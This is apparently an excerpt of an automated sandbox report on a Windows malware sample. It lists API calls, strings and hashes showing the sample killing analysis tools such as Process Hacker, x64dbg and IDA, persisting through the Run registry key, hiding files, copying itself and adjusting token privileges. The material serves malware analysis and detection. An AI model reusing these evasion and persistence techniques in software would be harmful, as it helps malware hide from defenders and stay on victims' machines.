Part of subcall function 00007FF7E52B3E24: wcscmp.MSVCRT ref: 00007FF7E52B3E91
Part of subcall function 00007FF7E52B3E24: OpenProcess.KERNEL32 ref: 00007FF7E52B3EA7
Part of subcall function 00007FF7E52B3E24: TerminateProcess.KERNEL32 ref: 00007FF7E52B3ECA
Part of subcall function 00007FF7E52B3E24: CloseHandle.KERNEL32 ref: 00007FF7E52B3ED8
Part of subcall function 00007FF7E52B3E24: Process32NextW.KERNEL32 ref: 00007FF7E52B3EEB
Part of subcall function 00007FF7E52B3E24: CloseHandle.KERNEL32 ref: 00007FF7E52B3EFD

Part of subcall function 00007FF7E52B39B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7E52B3B0C), ref: 00007FF7E52B39E4

Sleep.KERNEL32 ref: 00007FF7E52B31C6

Strings

ProcessHacker.exe, xrefs: 00007FF7E52B3142
procexp64.exe, xrefs: 00007FF7E52B315A
x64dbg.exe, xrefs: 00007FF7E52B3172
idaq64.exe, xrefs: 00007FF7E52B317E
procmon.exe, xrefs: 00007FF7E52B31A2
procexp.exe, xrefs: 00007FF7E52B314E
idaq.exe, xrefs: 00007FF7E52B318A
Services, xrefs: 00007FF7E52B31B5
TOTALCMD.exe, xrefs: 00007FF7E52B3166
autoruns.exe, xrefs: 00007FF7E52B3196

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
API String ID: 2853470409-928700279
Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
Instruction ID: 999d87fb475b494b90df3869ec926774e7e48570c3f5560f715b54259dfee72f
Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
Instruction Fuzzy Hash: AA217BE0A5894A50EA94F720DC713B4E268BF68F50FD44533E45DC21E6DE3DB9098633

Function 00007FF7E52B2E6C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF7E52B2E85
ReleaseMutex.KERNEL32 ref: 00007FF7E52B2E9D
CloseHandle.KERNEL32 ref: 00007FF7E52B2EA8
GetLastError.KERNEL32 ref: 00007FF7E52B2EB5
ReleaseMutex.KERNEL32 ref: 00007FF7E52B2EC7
CloseHandle.KERNEL32 ref: 00007FF7E52B2ED2

Strings

rbNSpGEsyb, xrefs: 00007FF7E52B2E70

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorLast
String ID: rbNSpGEsyb
API String ID: 299056699-189039185
Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
Instruction ID: 0642ba919600f8b9de3ccd814af6d60c2ab0057cfdc30560ee2d7f126bc5bdd1
Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
Instruction Fuzzy Hash: 7C01006290CA0581EB74AB11EC64369A778FBCCF94F880232D94ED2674CF3CE5858622

Function 00007FF7E52B3E24 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7E52B3E37
Process32FirstW.KERNEL32 ref: 00007FF7E52B3E6A
CloseHandle.KERNEL32 ref: 00007FF7E52B3E7C

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID:
API String ID: 1083639309-0
Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
Instruction ID: 6e480685bd25d188cc00c66421aafef3bbb85132ae6c9baca588b683f5c412bc
Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
Instruction Fuzzy Hash: 47212771A0C98981EBB0AB15EC6836AE368FFD8F54F844336C55E825A8DF3DD445CB11

Function 00007FF7E52B2F0C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF7E52B2F1E
ReleaseMutex.KERNEL32 ref: 00007FF7E52B2F36
CloseHandle.KERNEL32 ref: 00007FF7E52B2F41
GetLastError.KERNEL32 ref: 00007FF7E52B2F4E
ReleaseMutex.KERNEL32 ref: 00007FF7E52B2F60
CloseHandle.KERNEL32 ref: 00007FF7E52B2F6B

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorLast
String ID:
API String ID: 299056699-0
Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
Instruction ID: 2a2f7665fd8fecca6a8832b5106b166b0431a5aa711fb25a7b15295ea6cdc311
Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
Instruction Fuzzy Hash: E901DE6691CA4582EB64AB21EC6436DA378FBCCF45F840536E98ED2674CF3CD5448622

Function 00007FF7E52B3CE4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF7E52B3D01
PathFindFileNameW.SHLWAPI ref: 00007FF7E52B3D14
wcslen.MSVCRT ref: 00007FF7E52B3D2A
wcsncpy.MSVCRT ref: 00007FF7E52B3DEF

Strings

Unknown, xrefs: 00007FF7E52B3DE0

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: FileName$FindModulePathwcslenwcsncpy
String ID: Unknown
API String ID: 4220601557-1654365787
Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
Instruction ID: a0e41d55a6a38c7a220cbc19af8769bd302f0d948737d3e432776235a3dd0fca
Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
Instruction Fuzzy Hash: BA31D97261CAC585DBB0EB19E8987AAB3A4F798B40F404136DA8DC3B68DF3DD154CB11

Function 00007FF7E52B3A74 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E52B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7E52B3784
Part of subcall function 00007FF7E52B3744: GetVolumeInformationW.KERNELBASE ref: 00007FF7E52B3801
Part of subcall function 00007FF7E52B3744: wsprintfW.USER32 ref: 00007FF7E52B38A2

Part of subcall function 00007FF7E52B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
Part of subcall function 00007FF7E52B38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
Part of subcall function 00007FF7E52B38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995

GetModuleFileNameW.KERNEL32 ref: 00007FF7E52B3AB9
DeleteFileW.KERNEL32 ref: 00007FF7E52B3AC4
CopyFileW.KERNEL32 ref: 00007FF7E52B3ADD
SetFileAttributesW.KERNEL32 ref: 00007FF7E52B3AF5

Strings

Services, xrefs: 00007FF7E52B3B00

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
String ID: Services
API String ID: 3209240227-2319745855
Opcode ID: 311e9769a5f9042a1c4d1274615ef5c6319402c3cf93bf79ed3cbc3423f0458e
Instruction ID: 74b461e13fc68567b4c63897fbb98cac2732082def9488eff697fb992837867f
Opcode Fuzzy Hash: 311e9769a5f9042a1c4d1274615ef5c6319402c3cf93bf79ed3cbc3423f0458e
Instruction Fuzzy Hash: 1B0188A1A1858652DFA0EB24EC643AA9364FB98B44FD04033D24DC35A8EE3CD249CB11

Function 00007FF7E52B3B84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B311C), ref: 00007FF7E52B3BC7
RegSetValueExW.ADVAPI32 ref: 00007FF7E52B3BFD
RegCloseKey.ADVAPI32 ref: 00007FF7E52B3C0C

Strings

Hidden, xrefs: 00007FF7E52B3B94
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 00007FF7E52B3B88

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: CloseOpenValue
String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
API String ID: 779948276-85274793
Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
Instruction ID: 6564cf23917d6a87b606184b7296d09634800162ee19dcede5aa38be54c2d556
Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
Instruction Fuzzy Hash: E5014C76618A808ADB909F14F85471AB778F788B94F901226EB8D83B68DF7CC144CF11

Function 00007FF7E52B39B4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7E52B3B0C), ref: 00007FF7E52B39E4
RegSetValueExW.ADVAPI32 ref: 00007FF7E52B3A39
RegCloseKey.ADVAPI32 ref: 00007FF7E52B3A48

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00007FF7E52B39D6

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: CloseOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 779948276-1428018034
Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
Instruction ID: 6c6fa1464ff4f5b2fc11fb66302106246aadef941fdf2229d2bd956d9c47cad2
Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
Instruction Fuzzy Hash: A9116672528B4486DB909B14F85072AB7A4FB88BA0F505331F96E83BE8DF7CD144CB11

Function 00007FF7E52B2F9C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E52B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
Part of subcall function 00007FF7E52B38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
Part of subcall function 00007FF7E52B38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995

Part of subcall function 00007FF7E52B46E4: CreateFileW.KERNELBASE ref: 00007FF7E52B472B

Part of subcall function 00007FF7E52B40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7E52B414B
Part of subcall function 00007FF7E52B40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7E52B415E
Part of subcall function 00007FF7E52B40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7E52B4186
Part of subcall function 00007FF7E52B40E4: AdjustTokenPrivileges.KERNELBASE ref: 00007FF7E52B41B1
Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B41BC
Part of subcall function 00007FF7E52B40E4: OpenProcess.KERNEL32 ref: 00007FF7E52B41D1
Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B4249

GetProcessHeap.KERNEL32 ref: 00007FF7E52B3037
HeapFree.KERNEL32 ref: 00007FF7E52B304A

Strings

.x64, xrefs: 00007FF7E52B2FEE
chFrWWdQWsLFevUr, xrefs: 00007FF7E52B2FDB

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
String ID: .x64$chFrWWdQWsLFevUr
API String ID: 3992431006-2286007224
Opcode ID: 66002f7cc1a048e7c990725712f415c121466e6a21f61a925546d1bd52d36aeb
Instruction ID: 651a06c44d721a237996f569c9899331d2e0da680c1933684e6e31ab98354fb5
Opcode Fuzzy Hash: 66002f7cc1a048e7c990725712f415c121466e6a21f61a925546d1bd52d36aeb
Instruction Fuzzy Hash: 41110DA0918A8A85EB90FB10EC643A5B7A8FB8CB04F844136D58CD3665DF3CE0458762

Analysis Process: explorer.exePID: 1028, Parent PID: 2888COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10.9%
Total number of Nodes:	396
Total number of Limit Nodes:	17

Executed Functions

Function 09825590 Relevance: 667.9, APIs: 171, Strings: 210, Instructions: 1153
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 0982617B
GetProcAddress.KERNEL32 ref: 09826187
LoadLibraryA.KERNEL32 ref: 098261AC
LoadLibraryA.KERNEL32 ref: 098261C1
LoadLibraryA.KERNEL32 ref: 098261D1
LoadLibraryA.KERNEL32 ref: 098261E6
LoadLibraryA.KERNEL32 ref: 098261F6
LoadLibraryA.KERNEL32 ref: 0982620B
LoadLibraryA.KERNEL32 ref: 0982621B
LoadLibraryA.KERNEL32 ref: 0982622B
LoadLibraryA.KERNEL32 ref: 0982623B
LoadLibraryA.KERNEL32 ref: 0982624B
LoadLibraryA.KERNEL32 ref: 0982625B
LoadLibraryA.KERNEL32 ref: 0982626B
GetProcAddress.KERNEL32 ref: 09826285
GetProcAddress.KERNEL32 ref: 098262B9
GetProcAddress.KERNEL32 ref: 098262D5
GetProcAddress.KERNEL32 ref: 098262F1
GetProcAddress.KERNEL32 ref: 0982630D
GetProcAddress.KERNEL32 ref: 09826329
GetProcAddress.KERNEL32 ref: 09826340
GetProcAddress.KERNEL32 ref: 09826357
GetProcAddress.KERNEL32 ref: 09826373
GetProcAddress.KERNEL32 ref: 0982638F
GetProcAddress.KERNEL32 ref: 098263AB
GetProcAddress.KERNEL32 ref: 098263C2
GetProcAddress.KERNEL32 ref: 098263DE
GetProcAddress.KERNEL32 ref: 098263F5
GetProcAddress.KERNEL32 ref: 0982640C
GetProcAddress.KERNEL32 ref: 09826423
GetProcAddress.KERNEL32 ref: 0982643F
GetProcAddress.KERNEL32 ref: 0982645B
GetProcAddress.KERNEL32 ref: 09826477
GetProcAddress.KERNEL32 ref: 09826493
GetProcAddress.KERNEL32 ref: 098264AF
GetProcAddress.KERNEL32 ref: 098264CB
GetProcAddress.KERNEL32 ref: 098264E7
GetProcAddress.KERNEL32 ref: 098264FE
GetProcAddress.KERNEL32 ref: 09826515
GetProcAddress.KERNEL32 ref: 0982652C
GetProcAddress.KERNEL32 ref: 0982654B
GetProcAddress.KERNEL32 ref: 09826562
GetProcAddress.KERNEL32 ref: 09826579
GetProcAddress.KERNEL32 ref: 09826590
GetProcAddress.KERNEL32 ref: 098265A7
GetProcAddress.KERNEL32 ref: 098265BE
GetProcAddress.KERNEL32 ref: 098265D5
GetProcAddress.KERNEL32 ref: 098265EC
GetProcAddress.KERNEL32 ref: 09826603
GetProcAddress.KERNEL32 ref: 0982661A
GetProcAddress.KERNEL32 ref: 09826631
GetProcAddress.KERNEL32 ref: 09826648
GetProcAddress.KERNEL32 ref: 0982665F
GetProcAddress.KERNEL32 ref: 09826676
GetProcAddress.KERNEL32 ref: 0982668D
GetProcAddress.KERNEL32 ref: 098266A4
GetProcAddress.KERNEL32 ref: 098266BB
GetProcAddress.KERNEL32 ref: 098266D2
GetProcAddress.KERNEL32 ref: 098266E9
GetProcAddress.KERNEL32 ref: 09826708
GetProcAddress.KERNEL32 ref: 0982671F
GetProcAddress.KERNEL32 ref: 0982673B
GetProcAddress.KERNEL32 ref: 09826752
GetProcAddress.KERNEL32 ref: 0982676E
GetProcAddress.KERNEL32 ref: 0982678A
GetProcAddress.KERNEL32 ref: 098267A6
GetProcAddress.KERNEL32 ref: 098267C2
GetProcAddress.KERNEL32 ref: 098267DE
GetProcAddress.KERNEL32 ref: 098267F5
GetProcAddress.KERNEL32 ref: 0982680C
GetProcAddress.KERNEL32 ref: 09826823
GetProcAddress.KERNEL32 ref: 0982683A
GetProcAddress.KERNEL32 ref: 09826851
GetProcAddress.KERNEL32 ref: 09826868
GetProcAddress.KERNEL32 ref: 09826884
GetProcAddress.KERNEL32 ref: 098268A0
GetProcAddress.KERNEL32 ref: 098268BC
GetProcAddress.KERNEL32 ref: 098268D3
GetProcAddress.KERNEL32 ref: 098268EA
GetProcAddress.KERNEL32 ref: 09826906
GetProcAddress.KERNEL32 ref: 0982691D
GetProcAddress.KERNEL32 ref: 09826934
GetProcAddress.KERNEL32 ref: 0982694B
GetProcAddress.KERNEL32 ref: 09826962
GetProcAddress.KERNEL32 ref: 09826979
GetProcAddress.KERNEL32 ref: 09826998
GetProcAddress.KERNEL32 ref: 098269AF
GetProcAddress.KERNEL32 ref: 098269C6
GetProcAddress.KERNEL32 ref: 098269DD
GetProcAddress.KERNEL32 ref: 098269F4
GetProcAddress.KERNEL32 ref: 09826A0B
GetProcAddress.KERNEL32 ref: 09826A22
GetProcAddress.KERNEL32 ref: 09826A39
GetProcAddress.KERNEL32 ref: 09826A50
GetProcAddress.KERNEL32 ref: 09826A67
GetProcAddress.KERNEL32 ref: 09826A7E
GetProcAddress.KERNEL32 ref: 09826A95
GetProcAddress.KERNEL32 ref: 09826AAC
GetProcAddress.KERNEL32 ref: 09826AC3
GetProcAddress.KERNEL32 ref: 09826ADA
GetProcAddress.KERNEL32 ref: 09826AF1
GetProcAddress.KERNEL32 ref: 09826B08
GetProcAddress.KERNEL32 ref: 09826B1F
GetProcAddress.KERNEL32 ref: 09826B36
GetProcAddress.KERNEL32 ref: 09826B4D
GetProcAddress.KERNEL32 ref: 09826B64
GetProcAddress.KERNEL32 ref: 09826B7B
GetProcAddress.KERNEL32 ref: 09826B92
GetProcAddress.KERNEL32 ref: 09826BA9
GetProcAddress.KERNEL32 ref: 09826BC8
GetProcAddress.KERNEL32 ref: 09826BDF
GetProcAddress.KERNEL32 ref: 09826BF6
GetProcAddress.KERNEL32 ref: 09826C0D
GetProcAddress.KERNEL32 ref: 09826C24
GetProcAddress.KERNEL32 ref: 09826C3B
GetProcAddress.KERNEL32 ref: 09826C52
GetProcAddress.KERNEL32 ref: 09826C71
GetProcAddress.KERNEL32 ref: 09826C88
GetProcAddress.KERNEL32 ref: 09826C9F
GetProcAddress.KERNEL32 ref: 09826CB6
GetProcAddress.KERNEL32 ref: 09826CCD
GetProcAddress.KERNEL32 ref: 09826CE4
GetProcAddress.KERNEL32 ref: 09826CFB
GetProcAddress.KERNEL32 ref: 09826D12
GetProcAddress.KERNEL32 ref: 09826D29
GetProcAddress.KERNEL32 ref: 09826D40
GetProcAddress.KERNEL32 ref: 09826D57
GetProcAddress.KERNEL32 ref: 09826D6E
GetProcAddress.KERNEL32 ref: 09826D85
GetProcAddress.KERNEL32 ref: 09826D9C
GetProcAddress.KERNEL32 ref: 09826DB3
GetProcAddress.KERNEL32 ref: 09826DCA
GetProcAddress.KERNEL32 ref: 09826DE1
GetProcAddress.KERNEL32 ref: 09826DF8
GetProcAddress.KERNEL32 ref: 09826E0F
GetProcAddress.KERNEL32 ref: 09826E26
GetProcAddress.KERNEL32 ref: 09826E3D
GetProcAddress.KERNEL32 ref: 09826E54
GetProcAddress.KERNEL32 ref: 09826E6B
GetProcAddress.KERNEL32 ref: 09826E82
GetProcAddress.KERNEL32 ref: 09826E99
GetProcAddress.KERNEL32 ref: 09826EB0
GetProcAddress.KERNEL32 ref: 09826EC7
GetProcAddress.KERNEL32 ref: 09826EDE
GetProcAddress.KERNEL32 ref: 09826EF5
GetProcAddress.KERNEL32 ref: 09826F0C
GetProcAddress.KERNEL32 ref: 09826F23
GetProcAddress.KERNEL32 ref: 09826F3A
GetProcAddress.KERNEL32 ref: 09826F51
GetProcAddress.KERNEL32 ref: 09826F6D
GetProcAddress.KERNEL32 ref: 09826F84
GetProcAddress.KERNEL32 ref: 09826F9B
GetProcAddress.KERNEL32 ref: 09826FB2
GetProcAddress.KERNEL32 ref: 09826FC9
GetProcAddress.KERNEL32 ref: 09826FE0
GetProcAddress.KERNEL32 ref: 09826FF7
GetProcAddress.KERNEL32 ref: 0982700E
GetProcAddress.KERNEL32 ref: 09827025
GetProcAddress.KERNEL32 ref: 0982703C
